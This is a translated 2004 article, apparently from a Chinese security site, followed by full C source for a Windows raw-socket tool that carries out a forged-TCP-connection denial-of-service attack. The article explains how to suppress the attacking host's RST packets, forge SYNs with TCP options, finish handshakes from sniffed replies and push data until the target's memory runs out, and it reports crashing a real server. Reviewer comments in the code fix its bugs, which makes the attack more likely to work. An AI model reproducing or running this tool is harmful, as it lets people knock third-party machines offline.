A novel DoS: forged-TCP-connection denial of service


Creation time: 2004-08-16

Article attribute: original

Article submission:

LionD8 (liond8_at_eyou.com)

A novel DoS: forged-TCP-connection denial of service

Author: liond8

Email: liond8@126.com

QQ: 10415468

My Website: liond8.126.com

Date: 2004.08.12

Test platform VC 6.0 windows2000 server

Target Platform Windows 2000, Windows XP

Inspired by the NAPTHA attack, I wanted to extend the forged-connection idea so that it can be launched from an ordinary PC and is no longer limited to the local-area-network condition NAPTHA depends on. I spent some time studying what is written below; it is not idle talk. I am sharing it now even though it is not very mature, and I hope to discuss it with everyone.

NAPTHA was published in 2000. Why does it require a LAN? Partly to stay better hidden, but the more important reason is to keep the remote host's second-handshake packet (the SYN/ACK) away from the attacking host's own TCP stack: if that stack sees a SYN/ACK for a connection it never opened, it sends a RST and the forged connection is torn down. Besides that, NAPTHA by itself does not affect Windows much; the effect depends on how much memory Windows keeps per connection, and once a retransmission counter is reset the data is sent again. [Sense of the last sentence is unclear in the original.]

A is an attacker C being attacked:

A SYN --------> C

A SYN, ACK <----- C

A ACK --------> C

A send data -----> C

A Ack <-------- C

A send data -----> C

A Ack <-------- C

...

Test Results:

Against an ordinary ephemeral port such as 1025 it is quite effective: memory usage keeps rising until the machine stops responding and finally crashes. About 20 minutes were enough to bring down an Internet-café server.

Against port 80 the effect is less obvious: roughly 40 MB of memory is consumed and then usage levels off, leaving a large number of connections in the FIN_WAIT_1 and ESTABLISHED states.

Other ports I could not test conveniently because of my limited environment. Anyone who can test them is welcome to send me their results; discussion is welcome.

So there are roughly two problems to solve:

1. Hook and drop the RST packets this machine would send

Refer to Flashsky's article "Writing an NDIS filter-hook driver to implement IP packet filtering":

http://www.xfocus.net/articles/200210/457.html

Only one line needs changing. Replace

`if (packet[13] == 0x2 && sendInterfaceIndex == INVALID_PF_IF_INDEX)`

with

`if (packet[13] == 0x4 && sendInterfaceIndex != INVALID_PF_IF_INDEX)`

Byte 13 of the TCP header is the flags byte: 0x02 is SYN and 0x04 is RST. In the filter-hook callback an invalid send-interface index marks a packet on the receive path, so the original filter dropped incoming SYNs, while the modified one drops RSTs this host is about to send — which is exactly what stops the local stack from tearing down a connection it never opened. Note that this drops every outbound RST from the attacking host, not only those belonging to the forged connections.

See the original text in detail. The original text is very detailed.

2. Forging the data transmission

Sniffer analysis shows that the forged SYN must carry TCP options, just like a real one, so that the peer negotiates the segment size it is willing to receive. Otherwise, even though the connection is established, the peer never acknowledges the data we push, and its memory cannot be consumed. A plain SYN-scan probe — and NAPTHA's connection request — uses a bare 20-byte TCP header with no options. The option bytes are system dependent: my Windows 2000 sends 8 bytes, a friend's Windows 2000 sends 12. Taking my machine's 8 bytes as the example, the TCP header is 28 bytes long and the data-offset byte is TCP_HEAD.TH_LENRES = 0x70 (7 × 32-bit words).

One more thing to point out: the TCP checksum calculation.

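/* Standard Internet (RFC 1071) one's-complement checksum over `size` bytes
 * starting at `buffer`. A trailing odd byte is added as a low byte, which
 * is correct for the little-endian hosts this tool targets. The result is
 * returned in the byte order of the buffer, so it can be stored straight
 * into a header field without htons().
 * Bug fixed: the fold masked the sum with 0xFFF instead of 0xFFFF, keeping
 * only its low 12 bits, so the checksum was wrong for almost every input. */
unsigned short Checksum(unsigned short *buffer, int size)
{
    unsigned long cksum = 0;

    while (size > 1)
    {
        cksum += *buffer++;
        size -= (int)sizeof(unsigned short);
    }
    if (size)
    {
        cksum += *(unsigned char *)buffer;   /* odd trailing byte */
    }
    cksum = (cksum >> 16) + (cksum & 0xFFFF); /* fold carries into 16 bits */
    cksum += (cksum >> 16);                   /* fold the carry of the fold */
    return (unsigned short)(~cksum);
}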

When there is data after the 20-byte TCP header, the value this Checksum() produces does not match what Windows 2000 puts on the wire, and the difference depends on the data length. For example, with a 20-byte IP header, a 20-byte TCP header and 2 bytes of data, Checksum() gives 0x4523 while the system computes 0x4323 (both read back from the little-endian header field, i.e. 0x2345 versus 0x2343 on the wire — a difference of exactly 2, the data length).

So the author's correction is:

`tcpheader.th_sum = Checksum((USHORT *)szsendbuf, sizeof(psdheader) + sizeof(tcpheader) + dwsize);`

`tcpheader.th_sum = htons(ntohs(tcpheader.th_sum) - (USHORT)dwsize);`

dwsize is the length of the data. Without this correction the other side silently discards the forged packet (bad checksum) and its memory is never consumed. [Reviewer's note: the discrepancy is not a Windows quirk. The pseudo-header in this listing sets `psdheader.tcpl = htons(sizeof(tcpheader))`, i.e. 20, whereas the TCP length in the pseudo-header must cover the header plus options and data. Leaving dwsize out of the pseudo-header makes the one's-complement sum short by exactly dwsize, which the post-hoc subtraction compensates for — except that a two's-complement subtraction on the stored value can be off by one whenever it wraps. The correct fix is `psdheader.tcpl = htons(sizeof(tcpheader) + dwsize)` (and `+ optlen` for the SYN) with no adjustment afterwards.]

Here is the test code. Because this program can do real harm, it is deliberately not packaged as a convenient tool: you must sniff the TCP option bytes your own system sends in a SYN by hand and pass them on the command line as a hex string.

E.g.:

`Gzdos.exe 192.168.248.128 1025 020405b401010402 1000 65534`

The arguments are: target IP, target port, TCP option bytes in hex (here MSS 1460, NOP, NOP, SACK-permitted), delay in milliseconds between SYNs, and the first source port to use. Running `Gzdos.exe` with too few arguments prints the banner and an input error.

Source code:

#include "stdio.h"

#include "winsock2.h"

#include "windows.h"

#include

#include "wchar.h"

#pragma comment (Lib, "WS2_32.LIB")

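/* SIO_RCVALL: Windows-specific ioctl that puts a raw socket into
 * "receive all" mode so every IP packet arriving on the bound interface is
 * delivered. It is declared in <mstcpip.h>; defined here so the listing
 * builds with a bare winsock2.h. */
#define SIO_RCVALL _WSAIOW(IOC_VENDOR, 1)

/* ---- Run-time configuration, overwritten from argv in main() ---- */
char  *attack     = "192.168.248.128";  /* target IPv4 address, dotted quad */
USHORT attackport = 135;                /* target TCP port, host byte order */
USHORT startport  = 1;                  /* first forged source port */
int    sleeptime  = 2000;               /* ms to pause after each source port */

/* Raw TCP option bytes appended to every forged SYN (e.g. MSS, NOP,
 * SACK-permitted), parsed from argv[3] by ConvertOpt(). optlen must be a
 * multiple of 4 because it feeds the TCP data-offset field directly. */
UCHAR *optbuf = NULL;
USHORT optlen = 0;

/* Payload pushed on every forged data segment; main() fills it with 0x38. */
char  *psend = NULL;
DWORD  len   = 0;                       /* strlen(psend) */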

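/* IPv4 header without options: exactly 20 bytes, no padding. Multi-byte
 * fields are stored in network byte order by the code that fills them. */
typedef struct ip_head
{
    unsigned char  h_verlen;        /* version (high nibble) | IHL in 32-bit words */
    unsigned char  tos;
    unsigned short total_len;       /* IP header + TCP header + options/data */
    unsigned short ident;
    unsigned short frag_and_flags;  /* 0x0040 in memory = 0x4000 (DF) on the wire, little-endian host */
    unsigned char  ttl;
    unsigned char  proto;           /* IPPROTO_TCP */
    unsigned short checksum;        /* left 0 by this listing; relies on the stack filling it under IP_HDRINCL */
    unsigned int   sourceip;        /* network byte order */
    unsigned int   destip;          /* network byte order (spelled "desip" in the original) */
} IPHEADER;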

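/* TCP header without options: exactly 20 bytes, no padding. Options, when
 * present, are copied into the send buffer right after this struct and
 * accounted for in th_lenres. */
typedef struct tcp_head
{
    unsigned short th_sport;    /* network byte order */
    unsigned short th_dport;    /* network byte order */
    unsigned int   th_seq;      /* network byte order */
    unsigned int   th_ack;      /* network byte order */
    unsigned char  th_lenres;   /* data offset in 32-bit words (high nibble) | reserved bits */
    unsigned char  th_flag;     /* 0x02 SYN, 0x10 ACK, 0x12 SYN|ACK, 0x18 PSH|ACK */
    unsigned short th_win;
    unsigned short th_sum;      /* stored as returned by Checksum(), already in buffer order */
    unsigned short th_urp;
} TCPHEADER;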

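/* TCP pseudo-header used only as a checksum prefix: 12 bytes, no padding.
 * The address fields are 32-bit (`unsigned int`) rather than `unsigned
 * long` so the layout stays 12 bytes on LP64 compilers too. tcpl must be
 * the TCP length in network byte order — header PLUS options/data. */
typedef struct tsd_hdr
{
    unsigned int   saddr;       /* source address, network byte order */
    unsigned int   daddr;       /* destination address, network byte order */
    char           mbz;         /* must be zero */
    char           ptcl;        /* IPPROTO_TCP */
    unsigned short tcpl;        /* TCP segment length, network byte order */
} PSDHEADER;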

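/* One target in a singly linked list: an address and up to 10 ports.
 * uattackport is 0-terminated (index 10 is always the terminator when the
 * node comes from calloc), and each entry is already in network byte order
 * because it is copied straight into th_dport. */
typedef struct attack_obj
{
    unsigned int       dwip;             /* target address, network byte order */
    unsigned short     uattackport[11];  /* target ports, network order, 0-terminated */
    struct attack_obj *next;
} ATOBJ;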

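/* Head of the target list; InitStart() builds a single node from
 * `attack` / `attackport`. */
ATOBJ *listattackobj = NULL;

BOOL   InitStart(void);
DWORD  GetHostIP(void);
USHORT Checksum(USHORT *buffer, int size);
DWORD WINAPI ThreadSynFlood(LPVOID lp);
/* seq/ack/sip/aip/sport/aport are all in network byte order; pbuf/dwsize
 * may be NULL/0 for a bare ACK. */
void   SendData(DWORD seq, DWORD ack, USHORT sport, USHORT aport,
                DWORD sip, DWORD aip, char *pbuf, BOOL isdata, DWORD dwsize);
DWORD WINAPI ListeningFunc(LPVOID lpvoid);
void   Banner(void);
void   DebugIP(DWORD dwip);
void   ConvertOpt(char *pu);

/* Raw IP socket with IP_HDRINCL shared by every sender; created in
 * InitStart(). INVALID_SOCKET (not NULL) is the "not yet open" value a
 * SOCKET compares against. */
SOCKET sock = INVALID_SOCKET;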

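/* Entry point.
 *   argv: <target ip> <target port> <tcp options hex> <sleep ms> [start port]
 * Starts one ListeningFunc() thread per local IPv4 address (each sniffs the
 * target's replies and answers them), then runs ThreadSynFlood() on this
 * thread and finally sleeps so the listener threads stay alive.
 * Returns -1 on bad input or setup failure, 0 otherwise.
 * Requires Administrator (raw sockets). NOTE(review): Windows XP SP2 and
 * later refuse to send TCP segments over raw sockets, so this only runs as
 * described on Windows 2000 / pre-SP2 XP. */
int main(int argc, char *argv[])
{
    Banner();

    if (argc < 5)
    {
        printf("input error!\n");
        return -1;
    }

    /* 799 bytes of filler pushed on every data segment. */
    psend = (char *)malloc(800);
    if (psend == NULL)
    {
        printf("malloc error!\n");
        return -1;
    }
    memset(psend, 0x38, 799);
    psend[799] = 0;
    len = (DWORD)strlen(psend);

    attack = strdup(argv[1]);
    if (attack == NULL)
    {
        printf("malloc error!\n");
        return -1;
    }

    char *end = NULL;
    long port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || port < 1 || port > 65535)
    {
        printf("bad target port!\n");
        return -1;
    }
    attackport = (USHORT)port;

    /* Fills optbuf/optlen; leaves optbuf NULL when the hex string is bad.
     * The length must be a multiple of 4 because it is turned into the TCP
     * data-offset field, and at least 4 so optbuf[3] below is in bounds. */
    ConvertOpt(argv[3]);
    if (optbuf == NULL || optlen < 4 || (optlen % 4) != 0)
    {
        printf("bad tcp option bytes (even-length hex, byte count a multiple of 4)!\n");
        return -1;
    }
    /* The author decrements the fourth option byte (the low byte of the MSS
     * in the documented example). The article does not say why. */
    optbuf[3] -= 1;

    sleeptime = atoi(argv[4]);
    if (sleeptime < 0)
    {
        sleeptime = 0;
    }
    if (argc >= 6)
    {
        long sp = strtol(argv[5], &end, 10);
        if (end == argv[5] || *end != '\0' || sp < 1 || sp > 65534)
        {
            printf("bad start port!\n");
            return -1;
        }
        startport = (USHORT)sp;
    }

    if (InitStart() == FALSE)
    {
        return -1;
    }

    /* One sniffer thread per local address; WSAStartup() (in InitStart)
     * must precede gethostname()/gethostbyname(). */
    char hostname[255] = {0};
    if (gethostname(hostname, sizeof hostname) != 0)
    {
        printf("gethostname error!\n");
        return -1;
    }
    struct hostent *lp = gethostbyname(hostname);
    if (lp == NULL)
    {
        printf("gethostbyname error!\n");
        return -1;
    }
    for (int i = 0; lp->h_addr_list[i] != NULL; i++)
    {
        DWORD dwip = 0;
        memcpy(&dwip, lp->h_addr_list[i], sizeof dwip);
        HANDLE h = CreateThread(NULL, 0, ListeningFunc, (LPVOID)(ULONG_PTR)dwip, 0, NULL);
        if (h == NULL)
        {
            printf("create listeningfunc thread false!\n");
            return -1;
        }
        CloseHandle(h);     /* the thread keeps running; we never join it */
        Sleep(500);         /* let the sniffer bind before SYNs go out */
    }

    ThreadSynFlood(NULL);

    Sleep(5555555);         /* keep the process (and listeners) alive ~92 min */
    return 0;
}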

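/* Initialises Winsock, builds the single-target list from `attack` /
 * `attackport`, and opens the shared raw IP socket `sock` with IP_HDRINCL
 * (we supply the IP header ourselves) and a 2 s send timeout.
 * Returns TRUE on success, FALSE after printing the failing step.
 * Bugs fixed: sizeof(flag) was misspelled, and the SO_SNDTIMEO call was
 * missing its socket and level (SOL_SOCKET) arguments. */
BOOL InitStart(void)
{
    WSADATA wsadata;
    if (WSAStartup(MAKEWORD(2, 2), &wsadata) != 0)
    {
        printf("WSAStartup error!\n");
        return FALSE;
    }

    listattackobj = (ATOBJ *)calloc(1, sizeof(ATOBJ));
    if (listattackobj == NULL)
    {
        printf("calloc error!\n");
        return FALSE;
    }
    listattackobj->dwip = inet_addr(attack);
    if (listattackobj->dwip == INADDR_NONE)
    {
        printf("bad target ip!\n");
        return FALSE;
    }
    listattackobj->uattackport[0] = htons(attackport);  /* stored in network order */
    listattackobj->uattackport[1] = 0;                  /* terminator */
    listattackobj->next = NULL;

    sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if (sock == INVALID_SOCKET)
    {
        printf("socket setup error!\n");
        return FALSE;
    }

    BOOL flag = TRUE;
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR)
    {
        printf("setsockopt ip_hdrincl error!\n");
        return FALSE;
    }

    int ntimeover = 2000;   /* send timeout, ms */
    if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&ntimeover, sizeof(ntimeover)) == SOCKET_ERROR)
    {
        printf("setsockopt so_sndtimeo error!\n");
        return FALSE;
    }

    return TRUE;
}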

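/* Sends one forged SYN — with the user-supplied TCP options appended — from
 * every source port in [startport, 65534] to every port of every target in
 * `listattackobj`, pausing `sleeptime` ms after each source port. Every SYN
 * carries the fixed sequence number 0x00198288 so that ListeningFunc() can
 * recognise the target's SYN/ACK by its acknowledgement number (0x00198289).
 * Runs on the caller's thread; `lp` is unused. Returns 0 once the whole
 * list has been swept, 1 if the options are unusable or a send fails.
 * Fix against the original: the pseudo-header length now includes the
 * options, so the checksum is computed per RFC 793 and the post-hoc
 * "subtract optlen" adjustment is gone. */
DWORD WINAPI ThreadSynFlood(LPVOID lp)
{
    ATOBJ *patobj = listattackobj;
    struct sockaddr_in addr_in;
    IPHEADER ipheader;
    TCPHEADER tcpheader;
    PSDHEADER psdheader;
    char szsendbuf[1024] = {0};
    (void)lp;

    if (optbuf == NULL || (optlen % 4) != 0 ||
        sizeof(PSDHEADER) + sizeof(TCPHEADER) + optlen > sizeof(szsendbuf))
    {
        printf("invalid tcp options!\n");
        return 1;
    }
    const int tcplen = (int)sizeof(TCPHEADER) + optlen;   /* header + options */

    memset(&addr_in, 0, sizeof addr_in);
    while (patobj != NULL)
    {
        addr_in.sin_family = AF_INET;
        addr_in.sin_addr.s_addr = patobj->dwip;

        ipheader.h_verlen = (unsigned char)((4 << 4) | (sizeof(IPHEADER) / 4));  /* 0x45 */
        ipheader.tos = 0;
        ipheader.total_len = htons((USHORT)(sizeof(IPHEADER) + tcplen));
        ipheader.ident = 1;
        ipheader.frag_and_flags = 0x0040;   /* DF on the wire (little-endian host) */
        ipheader.ttl = 0x80;
        ipheader.proto = IPPROTO_TCP;
        ipheader.checksum = 0;              /* left to the stack under IP_HDRINCL */
        ipheader.destip = patobj->dwip;
        ipheader.sourceip = GetHostIP();

        tcpheader.th_ack = 0;
        tcpheader.th_lenres = (unsigned char)(((optlen / 4) + 5) << 4);   /* 0x70 for 8 option bytes */
        tcpheader.th_flag = 0x02;           /* SYN */
        tcpheader.th_win = htons(0x4470);
        tcpheader.th_urp = 0;
        tcpheader.th_seq = htonl(0x00198288);

        psdheader.saddr = ipheader.sourceip;
        psdheader.daddr = ipheader.destip;
        psdheader.mbz = 0;
        psdheader.ptcl = IPPROTO_TCP;
        psdheader.tcpl = htons((USHORT)tcplen);   /* header + options, not header alone */

        for (int l = startport; l < 65535; l++)
        {
            for (int k = 0; k < 11 && patobj->uattackport[k] != 0; k++)
            {
                tcpheader.th_dport = patobj->uattackport[k];
                tcpheader.th_sport = htons((USHORT)l);
                tcpheader.th_sum = 0;

                /* Checksum over pseudo-header + TCP header + options. */
                memcpy(szsendbuf, &psdheader, sizeof(PSDHEADER));
                memcpy(szsendbuf + sizeof(PSDHEADER), &tcpheader, sizeof(TCPHEADER));
                memcpy(szsendbuf + sizeof(PSDHEADER) + sizeof(TCPHEADER), optbuf, optlen);
                tcpheader.th_sum = Checksum((USHORT *)szsendbuf, (int)sizeof(PSDHEADER) + tcplen);

                /* Real packet: IP header + TCP header + options. The options
                 * land at a different offset than above, so copy them again. */
                memcpy(szsendbuf, &ipheader, sizeof(IPHEADER));
                memcpy(szsendbuf + sizeof(IPHEADER), &tcpheader, sizeof(TCPHEADER));
                memcpy(szsendbuf + sizeof(IPHEADER) + sizeof(TCPHEADER), optbuf, optlen);

                int rect = sendto(sock, szsendbuf, (int)sizeof(IPHEADER) + tcplen, 0,
                                  (struct sockaddr *)&addr_in, sizeof(addr_in));
                if (rect == SOCKET_ERROR)
                {
                    printf("send error!:%x\n", WSAGetLastError());
                    return 1;
                }
                printf("send ok %d\n", l);
            }
            Sleep(sleeptime);
        }

        patobj = patobj->next;
    }

    return 0;
}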

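/* Returns the LAST IPv4 address in this host's gethostbyname() list, in
 * network byte order, or 0 (INADDR_ANY) if the lookup fails or yields no
 * address. Picking the last entry is the author's choice; which interface
 * that corresponds to depends on adapter ordering — TODO confirm on the
 * attacking host. WSAStartup() must already have succeeded.
 * Fix against the original: a NULL hostent or an empty list no longer
 * dereferences NULL / indexes h_addr_list[-1]. */
DWORD GetHostIP(void)
{
    char hostname[255] = {0};
    if (gethostname(hostname, sizeof hostname) != 0)
    {
        return 0;
    }

    struct hostent *lp = gethostbyname(hostname);
    if (lp == NULL || lp->h_addr_list == NULL || lp->h_addr_list[0] == NULL)
    {
        return 0;
    }

    int last = 0;
    while (lp->h_addr_list[last + 1] != NULL)
    {
        last++;
    }

    DWORD dwip = 0;
    memcpy(&dwip, lp->h_addr_list[last], sizeof dwip);   /* avoids a misaligned DWORD read */
    return dwip;
}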

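/* Standard Internet (RFC 1071) one's-complement checksum over `size` bytes
 * starting at `buffer`. A trailing odd byte is added as a low byte, which
 * is correct for the little-endian hosts this tool targets. The result is
 * returned in the byte order of the buffer, so it can be stored straight
 * into a header field without htons().
 * Bug fixed: the fold masked the sum with 0xFFF instead of 0xFFFF, keeping
 * only its low 12 bits, so the checksum was wrong for almost every input. */
unsigned short Checksum(unsigned short *buffer, int size)
{
    unsigned long cksum = 0;

    while (size > 1)
    {
        cksum += *buffer++;
        size -= (int)sizeof(unsigned short);
    }
    if (size)
    {
        cksum += *(unsigned char *)buffer;   /* odd trailing byte */
    }
    cksum = (cksum >> 16) + (cksum & 0xFFFF); /* fold carries into 16 bits */
    cksum += (cksum >> 16);                   /* fold the carry of the fold */
    return (unsigned short)(~cksum);
}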

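/* Per-local-address sniffer thread. `lpvoid` carries the local IPv4
 * address (network order) to bind; the raw socket is then switched to
 * SIO_RCVALL so every IP packet arriving on that interface is delivered.
 * For each TCP segment whose source is the target:
 *   - SYN|ACK whose ack matches our fixed ISN + 1 (0x00198289): finish the
 *     handshake with a bare ACK and immediately push `len` bytes of psend;
 *   - plain ACK: push another `len` bytes, using the target's ack as our
 *     next sequence number and its seq as our ack.
 * Every other segment (RST, FIN, ACKs for unrelated traffic from the same
 * host) is ignored. Loops forever; bind() failure ends the whole process.
 * The SYN/ACK would also make the local stack emit a RST for a connection
 * it never opened — the article relies on an NDIS filter hook dropping
 * outbound RSTs for that.
 * Fixes against the original: the packet is length-checked before the
 * headers are read, the IP header length (IHL) is honoured instead of
 * assuming 20 bytes, and inet_addr(attack) is evaluated once. */
DWORD WINAPI ListeningFunc(LPVOID lpvoid)
{
    SOCKET rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if (rawsock == INVALID_SOCKET)
    {
        printf("sniffer socket setup error!\n");
        return 1;
    }

    struct sockaddr_in addr_in;
    memset(&addr_in, 0, sizeof addr_in);
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(8288);                 /* irrelevant for a raw IP socket */
    addr_in.sin_addr.s_addr = (DWORD)(ULONG_PTR)lpvoid;

    if (bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in)) == SOCKET_ERROR)
    {
        printf("bind false\n");
        exit(1);    /* no sniffer means no handshake can ever complete */
    }

    DWORD lpvbuffer = 1;
    DWORD lpcbbytesreturned = 0;
    if (WSAIoctl(rawsock, SIO_RCVALL, &lpvbuffer, sizeof(lpvbuffer), NULL, 0,
                 &lpcbbytesreturned, NULL, NULL) == SOCKET_ERROR)
    {
        /* The original ignored this; keep going but say so. */
        printf("sio_rcvall error!:%x\n", WSAGetLastError());
    }

    const DWORD target = inet_addr(attack);

    for (;;)
    {
        struct sockaddr_in from;
        int size = sizeof(from);
        char recvbuf[256] = {0};

        int ret = recvfrom(rawsock, recvbuf, sizeof(recvbuf), 0, (struct sockaddr *)&from, &size);
        if (ret == SOCKET_ERROR || ret < (int)sizeof(IPHEADER))
        {
            continue;
        }

        IPHEADER *lpipheader = (IPHEADER *)recvbuf;
        if (lpipheader->proto != IPPROTO_TCP || lpipheader->sourceip != target)
        {
            continue;
        }

        /* IP options would shift the TCP header; use the IHL field. */
        int iphlen = (lpipheader->h_verlen & 0x0f) * 4;
        if (iphlen < (int)sizeof(IPHEADER) || ret < iphlen + (int)sizeof(TCPHEADER))
        {
            continue;
        }
        TCPHEADER *lptcpheader = (TCPHEADER *)(recvbuf + iphlen);

        if (lptcpheader->th_flag == 0x12)           /* SYN|ACK: the port is open */
        {
            if (lptcpheader->th_ack == htonl(0x00198289))
            {
                DWORD nextack = htonl(ntohl(lptcpheader->th_seq) + 1);
                /* Forged third handshake packet. */
                SendData(lptcpheader->th_ack, nextack,
                         lptcpheader->th_dport, lptcpheader->th_sport,
                         lpipheader->destip, lpipheader->sourceip, NULL, FALSE, 0);
                /* Push data straight away. */
                SendData(lptcpheader->th_ack, nextack,
                         lptcpheader->th_dport, lptcpheader->th_sport,
                         lpipheader->destip, lpipheader->sourceip, psend, TRUE, len);
            }
        }
        else if (lptcpheader->th_flag == 0x10)      /* pure ACK: keep pushing */
        {
            SendData(lptcpheader->th_ack, lptcpheader->th_seq,
                     lptcpheader->th_dport, lptcpheader->th_sport,
                     lpipheader->destip, lpipheader->sourceip, psend, TRUE, len);
        }
    }
}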

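/* Builds and sends one forged TCP segment over the shared raw socket.
 *   seq, ack    : sequence / acknowledgement numbers, network byte order
 *   sport, aport: our source port / the target's port, network byte order
 *   sip, aip    : our address / the target's address, network byte order
 *   pbuf, dwsize: payload and its length; NULL / 0 for a bare ACK
 *   isdata      : TRUE -> flags PSH|ACK (0x18), FALSE -> ACK (0x10)
 * Errors are printed and swallowed. A dwsize that would overflow the
 * 1024-byte send buffer is rejected.
 * Checksum fix: the article corrected a wrong checksum by subtracting
 * dwsize afterwards. The real cause was a pseudo-header whose length field
 * excluded the payload; tcpl now covers header + data, which is correct
 * for every length and removes the off-by-one the subtraction had
 * whenever it wrapped (two's-complement vs one's-complement). */
void SendData(DWORD seq, DWORD ack, USHORT sport, USHORT aport, DWORD sip, DWORD aip,
              char *pbuf, BOOL isdata, DWORD dwsize)
{
    struct sockaddr_in addr_in;
    IPHEADER ipheader;
    TCPHEADER tcpheader;
    PSDHEADER psdheader;
    char szsendbuf[1024] = {0};

    if (pbuf == NULL)
    {
        dwsize = 0;     /* no buffer, no data, whatever the caller said */
    }
    if (dwsize > sizeof(szsendbuf) - sizeof(IPHEADER) - sizeof(TCPHEADER))
    {
        printf("senddata: payload too large (%lu)\n", (unsigned long)dwsize);
        return;
    }
    const int tcplen = (int)(sizeof(TCPHEADER) + dwsize);

    memset(&addr_in, 0, sizeof addr_in);
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = aport;
    addr_in.sin_addr.s_addr = aip;

    ipheader.h_verlen = (unsigned char)((4 << 4) | (sizeof(IPHEADER) / 4));  /* 0x45 */
    ipheader.tos = 0;
    ipheader.total_len = htons((USHORT)(sizeof(IPHEADER) + tcplen));
    ipheader.ident = 1;
    ipheader.frag_and_flags = 0x0040;   /* DF on the wire (little-endian host) */
    ipheader.ttl = 0x80;
    ipheader.proto = IPPROTO_TCP;
    ipheader.checksum = 0;              /* left to the stack under IP_HDRINCL */
    ipheader.sourceip = sip;
    ipheader.destip = aip;

    tcpheader.th_sport = sport;
    tcpheader.th_dport = aport;
    tcpheader.th_seq = seq;
    tcpheader.th_ack = ack;
    tcpheader.th_lenres = (unsigned char)((sizeof(TCPHEADER) / 4) << 4);   /* 0x50, no options */
    tcpheader.th_flag = isdata ? 0x18 : 0x10;
    tcpheader.th_win = htons(0x4470);
    tcpheader.th_sum = 0;
    tcpheader.th_urp = 0;

    psdheader.saddr = sip;
    psdheader.daddr = aip;
    psdheader.mbz = 0;
    psdheader.ptcl = IPPROTO_TCP;
    psdheader.tcpl = htons((USHORT)tcplen);   /* header + payload */

    /* Checksum over pseudo-header + TCP header + payload. */
    memcpy(szsendbuf, &psdheader, sizeof(PSDHEADER));
    memcpy(szsendbuf + sizeof(PSDHEADER), &tcpheader, sizeof(TCPHEADER));
    if (dwsize != 0)
    {
        memcpy(szsendbuf + sizeof(PSDHEADER) + sizeof(TCPHEADER), pbuf, dwsize);
    }
    tcpheader.th_sum = Checksum((USHORT *)szsendbuf, (int)sizeof(PSDHEADER) + tcplen);

    /* Real packet. The payload sits at a different offset than above
     * (IP header is 20 bytes, pseudo-header 12), so it is copied again. */
    memcpy(szsendbuf, &ipheader, sizeof(IPHEADER));
    memcpy(szsendbuf + sizeof(IPHEADER), &tcpheader, sizeof(TCPHEADER));
    if (dwsize != 0)
    {
        memcpy(szsendbuf + sizeof(IPHEADER) + sizeof(TCPHEADER), pbuf, dwsize);
    }

    int rect = sendto(sock, szsendbuf, (int)sizeof(IPHEADER) + tcplen, 0,
                      (struct sockaddr *)&addr_in, sizeof(addr_in));
    if (rect == SOCKET_ERROR)
    {
        printf("send error!:%x\n", WSAGetLastError());
        return;
    }

    if (pbuf != NULL)
    {
        printf("senddata ok %d\n", ntohs(sport));
    }
    else
    {
        printf("sendack ok %d\n", ntohs(sport));
    }
}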

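/* Prints the start-up banner, author contact and the usage line.
 * Fix against the listing: the line endings were printed as the literal
 * text "/n" instead of a newline escape, and the website line was split
 * across two string literals. */
void Banner(void)
{
    printf("*************************************************************\n");
    printf("Dog D.O.S Test\n");
    printf("Maker By LionD8. QQ: 10415468. Email: liond8@eyou.com\n");
    printf("Welcome to My Website: http://liond8.126.com\n");
    printf("For use only in licensed tests; any legal dispute is your own responsibility.\n");
    printf("*************************************************************\n");
    printf("GZDOS.exe <target ip> <target port> <tcp options hex> <sleep ms> [start port]\n");
}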

/* Debug helper: prints `dwip` (an IPv4 address in network byte order) in
 * dotted-quad form, with no trailing newline. */
void DebugIP(DWORD dwip)
{
    struct in_addr addr;

    memset(&addr, 0, sizeof addr);
    addr.s_addr = dwip;             /* s_addr maps to S_un.S_addr on Winsock */
    printf("%s", inet_ntoa(addr));
}

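/* Decodes one hex digit; returns -1 for anything outside 0-9 / a-f / A-F. */
static int HexNibble(int c)
{
    if (c >= '0' && c <= '9')
    {
        return c - '0';
    }
    if (c >= 'a' && c <= 'f')
    {
        return c - 'a' + 10;
    }
    if (c >= 'A' && c <= 'F')
    {
        return c - 'A' + 10;
    }
    return -1;
}

/* Parses the hex string `pu` (e.g. "020405b401010402", first character is
 * the high nibble) into the globals optbuf / optlen, which hold the raw
 * TCP option bytes appended to every forged SYN. On any error — empty or
 * odd-length input, a non-hex character, or allocation failure — optbuf is
 * left NULL and optlen 0 so main() can refuse to start.
 * Bugs fixed against the listing as printed: the digit test used `< '9'`,
 * so '9' decoded as 2; and only upper-case letters were handled, so the
 * documented example's 'b' decoded to 0x2b. */
void ConvertOpt(char *pu)
{
    optbuf = NULL;
    optlen = 0;

    if (pu == NULL)
    {
        return;
    }
    size_t lentemp = strlen(pu);
    if (lentemp == 0 || (lentemp % 2) != 0 || lentemp / 2 > 0xFFFF)
    {
        return;
    }

    unsigned char *out = (unsigned char *)malloc(lentemp / 2);
    if (out == NULL)
    {
        return;
    }

    for (size_t i = 0; i < lentemp; i += 2)
    {
        int hi = HexNibble((unsigned char)pu[i]);
        int lo = HexNibble((unsigned char)pu[i + 1]);
        if (hi < 0 || lo < 0)
        {
            free(out);
            return;
        }
        out[i / 2] = (unsigned char)((hi << 4) | lo);
    }

    optbuf = out;
    optlen = (USHORT)(lentemp / 2);
}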

references:

Flashsky, "Writing an NDIS filter-hook driver to implement IP packet filtering" (xfocus, 2002)

TCP/IP Illustrated, Volume 1

